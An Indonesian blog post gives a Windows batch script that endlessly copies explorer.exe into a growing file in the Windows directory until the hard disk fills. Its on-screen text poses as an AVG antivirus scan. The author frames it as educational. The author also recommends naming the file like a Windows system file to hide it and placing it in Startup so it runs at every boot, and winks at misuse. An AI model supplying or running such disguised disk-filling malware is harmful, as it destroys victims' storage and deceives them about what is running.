10.05.2009

Menghabiskan ruang hardisk dengan sekali klik.

Wah judulnya serem banget yach…!!??

Tapi ini cuma buat pembelajaran lho, sebenarnya saya hanya ingin menerangkan bagaimana berbahayanya sebuah file .Bat. Sebenarnya artikel ini sudah jadoel banget, sudah banyak mungkin yang menulis artikel mirip-mirip begini. Ya maklum trik ini sudah ada sejak adanya MSDOS, karena trik ini akan menggunakan DOS. Tapi yasudahlah tidak apa. Langsung saja kita mulai..

Membanjiri Hardisk dengan Satu Kali Klik.

Pertama coba buka notepad.

Ketik script berikut :

—————————————————

@echo off

:awal
TYPE %WINDIR%\explorer.exe >> %WINDIR%\AVGguard.exe
cls

echo.
echo AVG Control Guard
echo Scanning this Computer
echo.
echo Press CTRL+C if process not Responding.
echo and answer YES.
echo —————————————
echo thanks : www.avg.com
goto awal

—————————————————

Save dengan nama Virus.bat (atau nama lain, sesuka anda) lalu coba klik 2 kali file tersebut, maka kira - kira akan tampil seperti berikut :

Script tersebut akan membuat sebuah file dengan nama AvgGuard.exe di C:\windows\system32.

Nama bisa anda ganti di Script, sebisa mungkin buat nama file yang susah di tebak, misal winlogon.dll, winId.dll atau wind32.txt, ya pokoknya menyerupai file-file milik windows(agar sulit dicari).

Coba lihat ukuran file AvgGuard tersebut, besar sekali bukan ?

Besar ukuran file tersebut tergantung dari lama anda membiarkan program tersebut berjalan ! Jika tadi anda buru - buru menekan CTRL+C maka ukuran file mungkin kecil.

Itu karena program itu akan memasukan file explorer.exe ke dalam file AvgGuard.exe yang dibuat saat program dijalankan, terus menerus dimasukan sampai anda menekan CTRL+C, Jadi jika anda tidak menekan CTRL + C maka file explorer.exe akan dimasukan terus ke dalam file AvgGuard.exe, dan bayangkan berapa ukuran file tersebut nantinya.

Bisa - bisa hardisk Penuh.

Lebih bahaya lagi kalau file tersebut diletakkan si Startup, maka setiap komputer di hidupkan maka hardisk akan berkurang ruang kosongnya.

Bahaya Sekali, jadi saya sarankan agar tidak di gunakan untuk hal - hal buruk yach, Kecuali kepepet :)hehee

Sekian….

Selamat mencoba.

0 komentar:

Posting Komentar